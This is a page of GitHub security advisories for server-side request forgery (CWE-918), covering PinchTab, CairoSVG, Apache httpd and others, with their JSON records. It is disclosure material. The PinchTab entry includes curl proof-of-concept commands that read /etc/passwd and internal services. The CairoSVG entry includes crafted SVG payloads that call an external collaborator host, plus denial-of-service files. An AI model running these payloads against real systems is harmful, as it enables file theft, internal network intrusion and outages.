CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4628 vulnerabilities reference this CWE, most recent first.
GHSA-RW8P-C6HF-Q3PG
Vulnerability from github – Published: 2026-03-06 18:40 – Updated: 2026-03-09 15:50SSRF with Full Response Exfiltration via Download Handler
Summary
A Server-Side Request Forgery (SSRF) vulnerability in the /download endpoint allows any user with API access to induce the PinchTab server to make requests to arbitrary URLs, including internal network services and local system files, and exfiltrate the full response content.
Details
The GET /download?url=<url> handler in download.go accepts a user-controlled url parameter and passes it directly to chromedp.Navigate(dlURL) without any validation or sanitization.
// internal/handlers/download.go:78
if err := chromedp.Run(ctx, chromedp.Navigate(dlURL)); err != nil {
return fmt.Errorf("navigate to %s: %w", dlURL, err)
}
Since the request is performed by the headless Chrome browser instance managed by PinchTab, it can access:
1. Local Files: Using the file:// scheme (e.g., file:///etc/passwd).
2. Internal Services: Accessing services bound to localhost or internal network IPs that are not reachable from the outside.
3. Cloud Metadata: Accessing cloud provider metadata endpoints (e.g., 169.254.169.254).
The server then returns the captured response body directly to the attacker, enabling full exfiltration of sensitive data.
PoC
To reproduce the vulnerability, ensure the PinchTab server is running and accessible.
-
Local File Read: Execute the following curl command to read
/etc/passwd:bash curl -X GET "http://localhost:9867/download?url=file:///etc/passwd" -
Internal Service Access: If a service is running on
localhost:8080, access it via:bash curl -X GET "http://localhost:9867/download?url=http://localhost:8080/internal-admin"
The response will contain the content of the targeted file or service.
PoC video:
https://github.com/user-attachments/assets/b15776ea-13cc-4534-ba7b-6d5c4e0ee74f
Impact
This is a high-severity SSRF vulnerability. It impacts the confidentiality and security of the host system and the internal network where PinchTab is deployed. Attackers can exfiltrate sensitive system files, probe internal network infrastructure, and potentially gain access to internal management interfaces or cloud credentials. While PinchTab is often used in local environments, any deployment where the API is exposed (even with authentication) allows a compromised or malicious client to pivot into the internal network.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.7.6"
},
"package": {
"ecosystem": "Go",
"name": "github.com/pinchtab/pinchtab/cmd/pinchtab"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30834"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-06T18:40:58Z",
"nvd_published_at": "2026-03-07T16:15:56Z",
"severity": "HIGH"
},
"details": "# SSRF with Full Response Exfiltration via Download Handler\n\n### Summary\nA Server-Side Request Forgery (SSRF) vulnerability in the `/download` endpoint allows any user with API access to induce the PinchTab server to make requests to arbitrary URLs, including internal network services and local system files, and exfiltrate the full response content.\n\n### Details\nThe `GET /download?url=\u003curl\u003e` handler in [download.go](file:///Users/quan.m.le/Workspaces/pinchtab/internal/handlers/download.go#L78) accepts a user-controlled `url` parameter and passes it directly to `chromedp.Navigate(dlURL)` without any validation or sanitization.\n\n```go\n// internal/handlers/download.go:78\nif err := chromedp.Run(ctx, chromedp.Navigate(dlURL)); err != nil {\n return fmt.Errorf(\"navigate to %s: %w\", dlURL, err)\n}\n```\n\nSince the request is performed by the headless Chrome browser instance managed by PinchTab, it can access:\n1. **Local Files**: Using the `file://` scheme (e.g., `file:///etc/passwd`).\n2. **Internal Services**: Accessing services bound to `localhost` or internal network IPs that are not reachable from the outside.\n3. **Cloud Metadata**: Accessing cloud provider metadata endpoints (e.g., `169.254.169.254`).\n\nThe server then returns the captured response body directly to the attacker, enabling full exfiltration of sensitive data.\n\n### PoC\nTo reproduce the vulnerability, ensure the PinchTab server is running and accessible.\n\n1. **Local File Read**:\n Execute the following curl command to read `/etc/passwd`:\n ```bash\n curl -X GET \"http://localhost:9867/download?url=file:///etc/passwd\"\n ```\n\n2. **Internal Service Access**:\n If a service is running on `localhost:8080`, access it via:\n ```bash\n curl -X GET \"http://localhost:9867/download?url=http://localhost:8080/internal-admin\"\n ```\n\nThe response will contain the content of the targeted file or service.\n\n\nPoC video:\n\nhttps://github.com/user-attachments/assets/b15776ea-13cc-4534-ba7b-6d5c4e0ee74f\n\n### Impact\nThis is a high-severity SSRF vulnerability. It impacts the confidentiality and security of the host system and the internal network where PinchTab is deployed. Attackers can exfiltrate sensitive system files, probe internal network infrastructure, and potentially gain access to internal management interfaces or cloud credentials. While PinchTab is often used in local environments, any deployment where the API is exposed (even with authentication) allows a compromised or malicious client to pivot into the internal network.",
"id": "GHSA-rw8p-c6hf-q3pg",
"modified": "2026-03-09T15:50:19Z",
"published": "2026-03-06T18:40:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-rw8p-c6hf-q3pg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30834"
},
{
"type": "PACKAGE",
"url": "https://github.com/pinchtab/pinchtab"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "PinchTab has SSRF with Full Response Exfiltration via Download Handler"
}
GHSA-RW92-2QPH-CJF9
Vulnerability from github – Published: 2021-11-25 00:00 – Updated: 2021-12-01 00:00The vSphere Web Client (FLEX/Flash) contains an SSRF (Server Side Request Forgery) vulnerability in the vSAN Web Client (vSAN UI) plug-in. A malicious actor with network access to port 443 on vCenter Server may exploit this issue by accessing a URL request outside of vCenter Server or accessing an internal service.
{
"affected": [],
"aliases": [
"CVE-2021-22049"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-24T17:15:00Z",
"severity": "CRITICAL"
},
"details": "The vSphere Web Client (FLEX/Flash) contains an SSRF (Server Side Request Forgery) vulnerability in the vSAN Web Client (vSAN UI) plug-in. A malicious actor with network access to port 443 on vCenter Server may exploit this issue by accessing a URL request outside of vCenter Server or accessing an internal service.",
"id": "GHSA-rw92-2qph-cjf9",
"modified": "2021-12-01T00:00:49Z",
"published": "2021-11-25T00:00:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22049"
},
{
"type": "WEB",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0027.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RWCC-RGPQ-6QV7
Vulnerability from github – Published: 2023-11-14 15:30 – Updated: 2023-11-14 15:30Server-Side Request Forgery (SSRF) in GitHub repository salesagility/suitecrm prior to 7.14.2, 8.4.2, 7.12.14.
{
"affected": [],
"aliases": [
"CVE-2023-6124"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T15:15:08Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) in GitHub repository salesagility/suitecrm prior to 7.14.2, 8.4.2, 7.12.14.",
"id": "GHSA-rwcc-rgpq-6qv7",
"modified": "2023-11-14T15:30:24Z",
"published": "2023-11-14T15:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6124"
},
{
"type": "WEB",
"url": "https://github.com/salesagility/suitecrm/commit/54bc56c3bd9f1db75408db1c1d7d652c3f5f71e9"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/aed4d8f3-ab9a-42fd-afea-b3ec288a148e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RWCM-VVJ8-QGG5
Vulnerability from github – Published: 2025-03-29 00:31 – Updated: 2025-03-31 21:32maccms10 v2025.1000.4047 has a Server-Side Request Forgery (SSRF) vulnerability via Add Article.
{
"affected": [],
"aliases": [
"CVE-2025-28091"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-28T22:15:18Z",
"severity": "CRITICAL"
},
"details": "maccms10 v2025.1000.4047 has a Server-Side Request Forgery (SSRF) vulnerability via Add Article.",
"id": "GHSA-rwcm-vvj8-qgg5",
"modified": "2025-03-31T21:32:46Z",
"published": "2025-03-29T00:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28091"
},
{
"type": "WEB",
"url": "https://www.yuque.com/morysummer/vx41bz/ax55rxv4u3our1ic"
},
{
"type": "WEB",
"url": "https://www.yuque.com/morysummer/vx41bz/xo5w1euakvtgenex"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RWJF-4F53-289H
Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2022-05-24 19:14The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.
{
"affected": [],
"aliases": [
"CVE-2021-33705"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-15T19:15:00Z",
"severity": "HIGH"
},
"details": "The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.",
"id": "GHSA-rwjf-4f53-289h",
"modified": "2022-05-24T19:14:34Z",
"published": "2022-05-24T19:14:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33705"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3074844"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165743/SAP-Enterprise-Portal-iviewCatcherEditor-Server-Side-Request-Forgery.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Jan/72"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RWMF-W63J-P7GV
Vulnerability from github – Published: 2023-03-20 21:27 – Updated: 2024-11-18 16:26SSRF vulnerability
Summary
When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
Details
A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server.
PoC
- Generating malicious svg file: 1.1 CairoSVG_exploit.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
<![CDATA[
@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
rect { fill: red; stroke: blue; stroke-width: 3 }
]]>
</style>
</svg>
1.2 CairoSVG_exploit_2.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
<image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
</pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
1.3 CairoSVG_exploit_3.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />
</svg>
-
Run some commands:
$ python3 -m cairosvg CairoSVG_exploit.svg -f png$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png -
See result requests in Burp Collaborator:

DOS vulnerability with SSTI
Summary
When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png(without timeout server will hang forever)
DOS vulnerability with stdin file descriptor
Summary
Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "CairoSVG"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-27586"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-20T21:27:15Z",
"nvd_published_at": "2023-03-20T16:15:00Z",
"severity": "HIGH"
},
"details": "# SSRF vulnerability\n\n## Summary\nWhen CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## Details\nA specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization\u0027s internal resources or a DDOS attack on external resources.\nIt looks like this bug can affect websites and cause request forgery on the server.\n\n## PoC\n1. Generating malicious svg file:\n1.1 CairoSVG_exploit.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cimage height=\"200\" width=\"200\" xlink:href=\"http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3\" /\u003e\n \u003cstyle type=\"text/css\"\u003e@import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5\");\u003c/style\u003e\n \u003cstyle type=\"text/css\"\u003e\n \u003c![CDATA[\n @import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9\");\n rect { fill: red; stroke: blue; stroke-width: 3 }\n ]]\u003e\n \u003c/style\u003e\n\u003c/svg\u003e\n```\n\n1.2 CairoSVG_exploit_2.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cdefs\u003e\n \u003cpattern id=\"img1\" patternUnits=\"userSpaceOnUse\" width=\"600\" height=\"450\"\u003e\n \u003cimage xlink:href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11\" x=\"0\" y=\"0\" width=\"600\" height=\"450\" /\u003e\n \u003c/pattern\u003e\n \u003c/defs\u003e\n \u003cpath d=\"M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z\" fill=\"url(#img1)\" /\u003e\n\u003c/svg\u003e\n```\n\n1.3 CairoSVG_exploit_3.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13\" /\u003e\n\u003c/svg\u003e\n```\n\n2. Run some commands:\n`$ python3 -m cairosvg CairoSVG_exploit.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png `\n\n3. See result requests in Burp Collaborator:\n\n\n\n\n# DOS vulnerability with SSTI\n\n## Summary\nWhen CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://192.168.56.1:1234/\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png`\n(without timeout server will hang forever)\n\n\n# DOS vulnerability with stdin file descriptor\n\n## Summary\n\nSpecially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"file:///dev/stdin\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`",
"id": "GHSA-rwmf-w63j-p7gv",
"modified": "2024-11-18T16:26:29Z",
"published": "2023-03-20T21:27:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27586"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kozea/CairoSVG"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/cairosvg/PYSEC-2023-9.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
"type": "CVSS_V4"
}
],
"summary": "CairoSVG improperly processes SVG files loaded from external resources"
}
GHSA-RWQR-M72Q-V6CM
Vulnerability from github – Published: 2022-10-25 19:00 – Updated: 2025-09-24 20:42A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.xmlgraphics:batik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.xmlgraphics:batik-bridge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.16"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-42890"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-25T23:10:03Z",
"nvd_published_at": "2022-10-25T17:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.",
"id": "GHSA-rwqr-m72q-v6cm",
"modified": "2025-09-24T20:42:40Z",
"published": "2022-10-25T19:00:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42890"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/401aa8595f52d085d40ff5b6b4ac0dd372423082"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/52f7a1ad6e3110ec295a35ffc94410eef085707a"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/eada57c716a2757579d53017f8b2aeadaad20edd"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/BATIK-1345"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/pkvhy0nsj1h1mlon008wtzhosbtxjwly"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00038.html"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202401-11"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2022/dsa-5264"
},
{
"type": "WEB",
"url": "https://xmlgraphics.apache.org/security.html"
},
{
"type": "WEB",
"url": "http://svn.apache.org/repos/asf/xmlgraphics/batik/trunk"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/10/25/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Untrusted code execution in Apache XML Graphics Batik"
}
GHSA-RWXQ-58VM-3V2J
Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2025-10-22 00:32A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.
{
"affected": [],
"aliases": [
"CVE-2021-40438"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-16T15:15:00Z",
"severity": "CRITICAL"
},
"details": "A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.",
"id": "GHSA-rwxq-58vm-3v2j",
"modified": "2025-10-22T00:32:21Z",
"published": "2022-05-24T19:14:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40438"
},
{
"type": "WEB",
"url": "https://www.tenable.com/security/tns-2021-17"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-4982"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40438"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-2.4.49-VWL69sWQ"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211008-0004"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-20"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00001.html"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029@%3Cusers.httpd.apache.org%3E"
